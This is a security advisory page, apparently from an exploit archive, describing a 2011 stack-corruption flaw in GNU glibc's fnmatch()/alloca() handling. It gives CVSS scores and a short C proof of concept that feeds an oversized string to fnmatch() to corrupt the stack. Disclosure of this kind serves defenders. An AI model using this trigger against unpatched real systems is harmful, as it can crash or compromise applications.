GNU glibc < 2.12.2 alloca() Stack Corruption Vulnerability

2011-04-06 / 2011-04-07
Risk: High
Local: No
Remote: No
CWE: CWE-399


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

/* Source: http://www.securityfocus.com/bid/46563/info GNU glibc is prone to a stack-corruption vulnerability. An attacker can exploit this issue to execute arbitrary machine code in the context of the application that uses the affected library. Failed exploit attempts will likely crash the application. GNU glibc versions prior to 2.12.2 are vulnerable. */ #include <err.h> #include <fnmatch.h> #include <locale.h> #include <stdlib.h> #include <string.h> int main(int argc, const char* argv[]) { size_t num_as; char* p; setlocale(LC_ALL, "en_US.UTF8"); if (argc < 2) { errx(1, "Missing argument."); } num_as = atoi(argv[1]); if (num_as < 5) { errx(1, "Need 5."); } p = malloc(num_as); if (!p) { errx(1, "malloc() failed."); } memset(p, 'A', num_as); p[num_as - 1] = '\0'; p[0] = 'f'; p[1] = 'o'; p[2] = 'o'; p[3] = '.'; fnmatch("*.anim[1-9j]", p, 0); return 0; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top